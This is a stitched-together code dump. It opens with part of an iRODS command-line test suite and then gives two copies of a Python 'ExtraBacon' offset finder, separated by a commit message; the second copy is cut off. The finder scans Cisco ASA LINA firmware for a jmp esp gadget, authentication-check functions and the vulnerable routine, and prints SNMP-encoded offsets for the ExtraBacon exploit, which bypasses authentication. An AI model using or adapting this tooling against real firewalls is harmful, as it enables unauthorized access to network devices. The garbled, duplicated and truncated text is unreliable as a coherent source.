cmdout = s.adminsession.runCmd('ils', ['-L'])
print "[ils -L]:"
print "[" + cmdout[0] + "]"
lines = cmdout[0].splitlines()
for l in cmdout[0].splitlines():
if "demoResc" in l:
if "/session-" in l:
physicalpath = l.split()[2]
# check file is on disk
print "[ls -l " + physicalpath + "]:"
os.system("ls -l " + physicalpath)
assert os.path.exists(physicalpath)
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_iput_with_purgec(self):
# local setup
filename = "purgecfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput --purgec " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed only once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_local_iput_with_force_and_destination_resource__ticket_1706(self):
# local setup
filename = "iputwithforceanddestination.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename)
# overwrite test repl with different data
assertiCmd(s.adminsession, "iput -f -R %s %s %s" % (self.testresc, doublefile, filename))
# default resource should have dirty copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + filename])
# default resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " " + filename])
# targeted resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " " + doublesize + " ", "& " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
###################
# ireg
###################
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsadmin(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "ireg " + filepath + " /" + s.adminsession.getZoneName() + "/home/" +
s.adminsession.getUserName() + "/" + s.adminsession.sessionId + "/" + filename) # ireg
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # should be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser(self):
# local setup
filename = "newfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_ireg_as_rodsuser_in_vault(self):
# get vault base path
cmdout = s.sessions[1].runCmd('iquest', ["%s", "select RESC_VAULT_PATH where RESC_NAME = 'demoResc'"])
vaultpath = cmdout[0].rstrip('\n')
# make dir in vault if necessary
dir = os.path.join(vaultpath, 'home', s.sessions[1].getUserName())
if not os.path.exists(dir):
os.makedirs(dir)
# create file in vault
filename = "newfile.txt"
filepath = os.path.join(dir, filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.sessions[1], "ireg " + filepath + " /" + s.sessions[1].getZoneName() + "/home/" + s.sessions[
1].getUserName() + "/" + s.sessions[1].sessionId + "/" + filename, "ERROR", "PATH_REG_NOT_ALLOWED") # ireg
assertiCmdFail(s.sessions[1], "ils -L " + filename, "LIST", filename) # should not be listed
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
###################
# irepl
###################
def test_irepl_invalid_input(self):
# local setup
filename = "somefile.txt"
filepath = create_local_testfile(filename)
# assertions
# should not be listed
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist")
assertiCmd(s.adminsession, "iput " + filename) # put file
# for debugging
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename)
# replicate to bad resource
assertiCmd(s.adminsession, "irepl -R nonresc " + filename, "STDERR", "SYS_INVALID_INPUT_PARAM")
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_multithreaded(self):
# local setup
filename = "largefile.txt"
filepath = create_local_largefile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "STDERR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "STDOUT", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " -N 3 " + filename) # replicate to test resource
# test resource should be listed
assertiCmd(s.adminsession, "ils -l " + filename, "STDOUT", self.testresc)
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
# local cleanup
os.remove(filepath)
def test_irepl_update_replicas(self):
# local setup
filename = "updatereplicasfile.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "iadmin mkresc fourthresc unixfilesystem %s:/tmp/fourthrescVault" %
hostname, "LIST", "Creating") # create fourth resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
# replicate to test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# replicate to third resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename)
# replicate to fourth resource
assertiCmd(s.adminsession, "irepl -R fourthresc " + filename)
# repave overtop test resource
assertiCmd(s.adminsession, "iput -f -R " + self.testresc + " " + doublefile + " " + filename)
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -U " + filename) # update last replica
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a dirty copy
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -aU " + filename) # update all replicas
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# should have a clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
assertiCmd(s.adminsession, "iadmin rmresc fourthresc") # remove third resource
# local cleanup
os.remove(filepath)
os.remove(doublefile)
def test_irepl_over_existing_second_replica__ticket_1705(self):
# local setup
filename = "secondreplicatest.txt"
filepath = create_local_testfile(filename)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput -R " + self.testresc + " " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate to default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_third_replica__ticket_1705(self):
# local setup
filename = "thirdreplicatest.txt"
filepath = create_local_testfile(filename)
hostname = get_hostname()
# assertions
assertiCmd(s.adminsession, "iadmin mkresc thirdresc unixfilesystem %s:/tmp/thirdrescVault" %
hostname, "LIST", "Creating") # create third resource
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate to third resource
assertiCmd(s.adminsession, "irepl " + filename) # replicate overtop default resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate overtop test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R thirdresc " + filename) # replicate overtop third resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# should not have a replica 3
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 3 ", " & " + filename])
# should not have a replica 4
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 4 ", " & " + filename])
assertiCmd(s.adminsession, "irm -f " + filename) # cleanup file
assertiCmd(s.adminsession, "iadmin rmresc thirdresc") # remove third resource
# local cleanup
os.remove(filepath)
def test_irepl_over_existing_bad_replica__ticket_1705(self):
# local setup
filename = "reploverwritebad.txt"
filepath = create_local_testfile(filename)
doublefile = "doublefile.txt"
os.system("cat %s %s > %s" % (filename, filename, doublefile))
doublesize = str(os.stat(doublefile).st_size)
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename) # replicate to test resource
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", filename) # for debugging
# overwrite default repl with different data
assertiCmd(s.adminsession, "iput -f %s %s" % (doublefile, filename))
# default resource should have clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " & " + filename])
# default resource should have new double clean copy
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", " " + doublesize + " ", " & " + filename])
# test resource should not have doublesize file
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " " + filename])
# replicate back onto test resource
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + filename)
# test resource should have new clean doublesize file
assertiCmd(s.adminsession, "ils -L " + filename, "LIST",
[" 1 " + self.testresc, " " + doublesize + " ", " & " + filename])
# should not have a replica 2
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", " & " + filename])
# local cleanup
os.remove(filepath)
os.remove(doublefile)
# repl update ( repave old copies )
# walk through command line switches
def test_irepl_with_purgec(self):
# local setup
filename = "purgecreplfile.txt"
filepath = os.path.abspath(filename)
f = open(filepath, 'wb')
f.write("TESTFILE -- [" + filepath + "]")
f.close()
# assertions
assertiCmd(s.adminsession, "ils -L " + filename, "ERROR", "does not exist") # should not be listed
assertiCmd(s.adminsession, "iput " + filename) # put file
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " --purgec " + filename) # replicate to test resource
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 0 ", filename]) # should be trimmed
assertiCmd(s.adminsession, "ils -L " + filename, "LIST", [" 1 ", filename]) # should be listed once
assertiCmdFail(s.adminsession, "ils -L " + filename, "LIST", [" 2 ", filename]) # should be listed only once
# local cleanup
output = commands.getstatusoutput('rm ' + filepath)
def test_irepl_with_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
assertiCmd(s.adminsession, "irepl -r -M -R " + self.testresc + " " + homepath, "EMPTY" ) # creates replica
###################
# irm
###################
def test_irm_doesnotexist(self):
assertiCmdFail(s.adminsession, "irm doesnotexist") # does not exist
def test_irm(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should be in trash
assertiCmd(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_force(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -f " + self.testfile) # remove from grid
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be deleted
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
# should not be in trash
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST", self.testfile)
def test_irm_specific_replica(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irepl -R " + self.testresc + " " + self.testfile) # creates replica
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed twice
assertiCmd(s.adminsession, "irm -n 0 " + self.testfile) # remove original from grid
# replica 1 should be there
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", ["1 " + self.testresc, self.testfile])
assertiCmdFail(s.adminsession, "ils -L " + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica 0 should be gone
trashpath = "/" + s.adminsession.getZoneName() + "/trash/home/" + s.adminsession.getUserName() + \
"/" + s.adminsession.sessionId
assertiCmdFail(s.adminsession, "ils -L " + trashpath + "/" + self.testfile, "LIST",
["0 " + s.adminsession.getDefResource(), self.testfile]) # replica should not be in trash
def test_irm_recursive_file(self):
assertiCmd(s.adminsession, "ils -L " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irm -r " + self.testfile) # should not fail, even though a collection
def test_irm_recursive(self):
assertiCmd(s.adminsession, "icp -r " + self.testdir + " copydir") # make a dir copy
assertiCmd(s.adminsession, "ils -L ", "LIST", "copydir") # should be listed
assertiCmd(s.adminsession, "irm -r copydir") # should remove
assertiCmdFail(s.adminsession, "ils -L ", "LIST", "copydir") # should not be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_read_permission(self):
assertiCmd(s.sessions[1], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[1], "irm " + self.testfile) # read perm should not be allowed to remove
assertiCmd(s.sessions[1], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
@unittest.skipIf(RUN_IN_TOPOLOGY == True, "Skip for Topology Testing")
def test_irm_with_write_permission(self):
assertiCmd(s.sessions[2], "icd ../../public") # switch to shared area
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should be listed
assertiCmdFail(s.sessions[2], "irm " + self.testfile) # write perm should not be allowed to remove
assertiCmd(s.sessions[2], "ils -AL " + self.testfile, "LIST", self.testfile) # should still be listed
###################
# irmtrash
###################
def test_irmtrash_admin(self):
# assertions
assertiCmd(s.adminsession, "irm " + self.testfile) # remove from grid
assertiCmd(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be listed
assertiCmd(s.adminsession, "irmtrash") # should be listed
assertiCmdFail(s.adminsession, "ils -rL /" + s.adminsession.getZoneName() + "/trash/home/" +
s.adminsession.getUserName() + "/", "LIST", self.testfile) # should be deleted
###################
# itrim
###################
def test_itrim_with_admin_mode(self):
pydevtest_common.touch( "file.txt" )
for i in range(0, 100):
assertiCmd(s.sessions[1], "iput file.txt " + str(i) + ".txt", "EMPTY")
homepath = "/" + s.adminsession.getZoneName() + "/home/" + s.sessions[1].getUserName() + "/" + s.sessions[1].sessionId
assertiCmd(s.sessions[1], "irepl -R " + self.testresc + " -r " + homepath, "EMPTY" ) # creates replica
assertiCmd(s.adminsession, "itrim -M -N1 -r " + homepath, "LIST", "Number of files trimmed = 100." )
|
#!/usr/bin/env python2
"""
Finds ExtraBacon offsets in LINA.ELF files.
"""
import subprocess
import json
import binascii
LINA_FIND = """
[
{
"name": "JMPESP",
"find": [
"ff e4"
],
"match": "ff e4",
"type": "EXACT",
"oneshot": true,
"before": 0,
"after": 0
},
{
"name": "PMCHECK",
"find": [
"8b 75 08",
"89 7d fc",
"8b 16",
"85 d2"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "ADMAUTH",
"find": [
"c7 45 f0 01 00 00 00",
"66 c7 45 ?? c1 10"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "SAFE_RET",
"find": [
"8b 45 e4",
"89 44 24 18",
"8b 45 ??",
"89 44 24 14",
"8b 45 ec",
"89 44 24 10",
"8b ?? 10",
"89 ?? 24 08",
"89 ?? 24 0c",
"8b ?? 14",
"89 ?? 24 04",
"8b ?? 18",
"89 ?? 24",
"e8 ?? ?? ff ff",
"85 c0",
"--",
"a3 ?? ?? ?? ??",
"0f 84 ?? ?? ?? ??"
],
"match": "85 c0",
"type": "AFTER",
"oneshot": false,
"before": 1,
"after": 0
}
,
{
"name": "VULNFUNC",
"find": [
"89 e5",
"57",
"56",
"53",
"83 ec 6c",
"a1 ?? ?? ?? ??",
"8b 5d 1c",
"85 c0",
"0f 84 ?? ?? ?? ??",
"8b 03"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 0
}
]
"""
class Finder(object):
def __init__(self, fname):
self.fname = fname
self.sequences = []
self._parse_instructions()
def _parse_instructions(self):
cmd = ["objdump", "-M", "intel", "-w", "-j", ".text", "-D", self.fname]
ps = subprocess.Popen(cmd, stdout=subprocess.PIPE)
output = ps.communicate()[0]
self.instructions = []
for line in output.split("\n"):
line = line.split("\t")
if len(line) != 3 or ":" not in line[0]:
continue
instruction = {}
instruction["address"] = line[0].strip().replace(":", "")
instruction["bytes"] = line[1].strip()
instruction["operation"] = line[2].strip()
self.instructions.append(instruction)
def _check_wildcard(self, find_bytes, inst_bytes):
find_bytes = find_bytes.split(" ")
inst_bytes = inst_bytes.split(" ")
if len(find_bytes) != len(inst_bytes):
return False
for x in range(0, len(find_bytes)):
if find_bytes[x] == "??":
continue
if find_bytes[x] != inst_bytes[x]:
return False
return True
def _find_match(self, i, sequence):
import copy
for x in range(0, len(sequence["find"])):
find_bytes = sequence["find"][x]
inst_bytes = self.instructions[i + x]["bytes"]
if "--" in find_bytes:
continue
elif "??" in find_bytes:
if not self._check_wildcard(find_bytes, inst_bytes):
return None
elif find_bytes not in inst_bytes:
return None
if sequence['type'] == 'EXACT':
ret = copy.deepcopy(sequence)
ret['found'] = self.instructions[i - sequence['before'] : i + sequence['after'] + 1]
return ret
if sequence['type'] == 'BEFORE':
search_range = range(i, 0, -1)
else:
search_range = range(i, len(self.instructions))
for x in search_range:
if sequence['match'] == self.instructions[x]['bytes']:
ret = copy.deepcopy(sequence)
ret['found'] = self.instructions[x - sequence['before'] : x + sequence['after'] + 1]
return ret
return None
def search(self, jsondata):
self.sequences = json.loads(jsondata)
for i in range(0, len(self.instructions)):
for sequence in self.sequences:
match = self._find_match(i, sequence)
if match is not None:
if sequence['oneshot']:
self.sequences.remove(sequence)
yield match
def hex_to_snmp(hex_str, convert_endian = True):
if (len(hex_str) == 7):
hex_str = "0" + hex_str
#print hex_str
hex = binascii.unhexlify(hex_str)
if convert_endian:
hex = reversed(hex)
ret = ""
for n in hex:
ret += str(int(binascii.hexlify(n), 16))
ret += "."
ret = ret[:-1]
return ret
# if you thought the above code was bad, get a load of this!
def post_auth_func(func):
before_bytes = []
for instr in func['found']:
for byte in instr['bytes'].split(" "):
if len(before_bytes) == 4:
continue
before_bytes.append(byte)
before_bytes = "".join(before_bytes)
addr = func['found'][0]['address']
bounds = addr[:-3]
bounds += "000"
name = func['name'].lower()
print("%s_offset\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(addr), int(addr, 16)))
print("%s_bounds\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(bounds), int(bounds, 16)))
print("%s_code\t= \"%s\"\t\t# 0x%08x" % (name,hex_to_snmp(before_bytes, False), int(before_bytes, 16)))
return addr, bounds, before_bytes
def post_process(results):
vuln = [a for a in results if a['name'] == 'VULNFUNC'][0]['found'][0]['address']
safes = [a for a in results if a['name'] == 'SAFE_RET']
admauth = [a for a in results if a['name'] == 'ADMAUTH'][0]
pmcheck = [a for a in results if a['name'] == 'PMCHECK'][0]
jmpesp = [a for a in results if a['name'] == 'JMPESP'][0]
for safe in safes:
op = safe['found'][0]['operation']
#print("%s = %s?" % (vuln, op))
if vuln in op:
addr = safe['found'][1]['address']
print("saferet_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(addr), int(addr, 16)))
jmpesp_bytes = jmpesp['found'][0]['bytes'].split(" ")
jmp_offset = 0
for x in range(0, len(jmpesp_bytes)):
if jmpesp_bytes[x] == "ff" and jmpesp_bytes[x + 1] == "e4":
jmp_offset = x
break
jmp_esp_addr = int(jmpesp['found'][0]['address'], 16)
jmp_esp_addr += jmp_offset
jmp_esp_str = "%07x" % jmp_esp_addr
print("jmp_esp_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(jmp_esp_str), jmp_esp_addr))
post_auth_func(admauth)
post_auth_func(pmcheck)
print("fix_ebp\t= \"72\"\t\t# 0x48")
if __name__ == '__main__':
import sys
try:
f = Finder(sys.argv[1])
matches = []
for match in f.search(LINA_FIND):
#print(match)
matches.append(match)
post_process(matches)
except IndexError:
print("Usage: %s lina_file" % sys.argv[0])
added ruby to lina generator
#!/usr/bin/env python2
"""
Finds ExtraBacon offsets in LINA.ELF files.
"""
import subprocess
import json
import binascii
LINA_FIND = """
[
{
"name": "JMPESP",
"find": [
"ff e4"
],
"match": "ff e4",
"type": "EXACT",
"oneshot": true,
"before": 0,
"after": 0
},
{
"name": "PMCHECK",
"find": [
"8b 75 08",
"89 7d fc",
"8b 16",
"85 d2"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "ADMAUTH",
"find": [
"c7 45 f0 01 00 00 00",
"66 c7 45 ?? c1 10"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 2
},
{
"name": "SAFE_RET",
"find": [
"8b 45 e4",
"89 44 24 18",
"8b 45 ??",
"89 44 24 14",
"8b 45 ec",
"89 44 24 10",
"8b ?? 10",
"89 ?? 24 08",
"89 ?? 24 0c",
"8b ?? 14",
"89 ?? 24 04",
"8b ?? 18",
"89 ?? 24",
"e8 ?? ?? ff ff",
"85 c0",
"--",
"a3 ?? ?? ?? ??",
"0f 84 ?? ?? ?? ??"
],
"match": "85 c0",
"type": "AFTER",
"oneshot": false,
"before": 1,
"after": 0
}
,
{
"name": "VULNFUNC",
"find": [
"89 e5",
"57",
"56",
"53",
"83 ec 6c",
"a1 ?? ?? ?? ??",
"8b 5d 1c",
"85 c0",
"0f 84 ?? ?? ?? ??",
"8b 03"
],
"match": "55",
"type": "BEFORE",
"oneshot": false,
"before": 0,
"after": 0
}
]
"""
class Finder(object):
def __init__(self, fname):
self.fname = fname
self.sequences = []
self._parse_instructions()
def _parse_instructions(self):
cmd = ["objdump", "-M", "intel", "-w", "-j", ".text", "-D", self.fname]
ps = subprocess.Popen(cmd, stdout=subprocess.PIPE)
output = ps.communicate()[0]
self.instructions = []
for line in output.split("\n"):
line = line.split("\t")
if len(line) != 3 or ":" not in line[0]:
continue
instruction = {}
instruction["address"] = line[0].strip().replace(":", "")
instruction["bytes"] = line[1].strip()
instruction["operation"] = line[2].strip()
self.instructions.append(instruction)
def _check_wildcard(self, find_bytes, inst_bytes):
find_bytes = find_bytes.split(" ")
inst_bytes = inst_bytes.split(" ")
if len(find_bytes) != len(inst_bytes):
return False
for x in range(0, len(find_bytes)):
if find_bytes[x] == "??":
continue
if find_bytes[x] != inst_bytes[x]:
return False
return True
def _find_match(self, i, sequence):
import copy
for x in range(0, len(sequence["find"])):
find_bytes = sequence["find"][x]
inst_bytes = self.instructions[i + x]["bytes"]
if "--" in find_bytes:
continue
elif "??" in find_bytes:
if not self._check_wildcard(find_bytes, inst_bytes):
return None
elif find_bytes not in inst_bytes:
return None
if sequence['type'] == 'EXACT':
ret = copy.deepcopy(sequence)
ret['found'] = self.instructions[i - sequence['before'] : i + sequence['after'] + 1]
return ret
if sequence['type'] == 'BEFORE':
search_range = range(i, 0, -1)
else:
search_range = range(i, len(self.instructions))
for x in search_range:
if sequence['match'] == self.instructions[x]['bytes']:
ret = copy.deepcopy(sequence)
ret['found'] = self.instructions[x - sequence['before'] : x + sequence['after'] + 1]
return ret
return None
def search(self, jsondata):
self.sequences = json.loads(jsondata)
for i in range(0, len(self.instructions)):
for sequence in self.sequences:
match = self._find_match(i, sequence)
if match is not None:
if sequence['oneshot']:
self.sequences.remove(sequence)
yield match
def hex_to_snmp(hex_str, convert_endian = True):
if (len(hex_str) == 7):
hex_str = "0" + hex_str
#print hex_str
hex = binascii.unhexlify(hex_str)
if convert_endian:
hex = reversed(hex)
ret = ""
for n in hex:
ret += str(int(binascii.hexlify(n), 16))
ret += "."
ret = ret[:-1]
return ret
# if you thought the above code was bad, get a load of this!
def post_auth_func(func):
before_bytes = []
for instr in func['found']:
for byte in instr['bytes'].split(" "):
if len(before_bytes) == 4:
continue
before_bytes.append(byte)
before_bytes = "".join(before_bytes)
addr = func['found'][0]['address']
bounds = addr[:-3]
bounds += "000"
name = func['name'].lower()
offset_snmp = hex_to_snmp(addr)
bounds_snmp = hex_to_snmp(bounds)
bytes_snmp = hex_to_snmp(before_bytes, False)
print("%s_offset\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(addr), int(addr, 16)))
print("%s_bounds\t= \"%s\"\t\t# 0x%08x" % (name, hex_to_snmp(bounds), int(bounds, 16)))
print("%s_code\t= \"%s\"\t\t# 0x%08x" % (name,hex_to_snmp(before_bytes, False), int(before_bytes, 16)))
return offset_snmp, bounds_snmp, bytes_snmp
def post_process(results):
vuln = [a for a in results if a['name'] == 'VULNFUNC'][0]['found'][0]['address']
safes = [a for a in results if a['name'] == 'SAFE_RET']
admauth = [a for a in results if a['name'] == 'ADMAUTH'][0]
pmcheck = [a for a in results if a['name'] == 'PMCHECK'][0]
jmpesp = [a for a in results if a['name'] == 'JMPESP'][0]
for safe in safes:
op = safe['found'][0]['operation']
#print("%s = %s?" % (vuln, op))
if vuln in op:
addr = safe['found'][1]['address']
saferet_snmp = hex_to_snmp(addr)
print("saferet_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(addr), int(addr, 16)))
jmpesp_bytes = jmpesp['found'][0]['bytes'].split(" ")
jmp_offset = 0
for x in range(0, len(jmpesp_bytes)):
if jmpesp_bytes[x] == "ff" and jmpesp_bytes[x + 1] == "e4":
jmp_offset = x
break
jmp_esp_addr = int(jmpesp['found'][0]['address'], 16)
jmp_esp_addr += jmp_offset
jmp_esp_str = "%07x" % jmp_esp_addr
print("jmp_esp_offset\t= \"%s\"\t\t# 0x%08x" % (hex_to_snmp(jmp_esp_str), jmp_esp_addr))
adm_offset_snmp, adm_bounds_snmp, adm_bytes_snmp = post_auth_func(admauth)
pm_offset_snmp, pm_bounds_snmp, pm_bytes_snmp = post_auth_func(pmcheck)
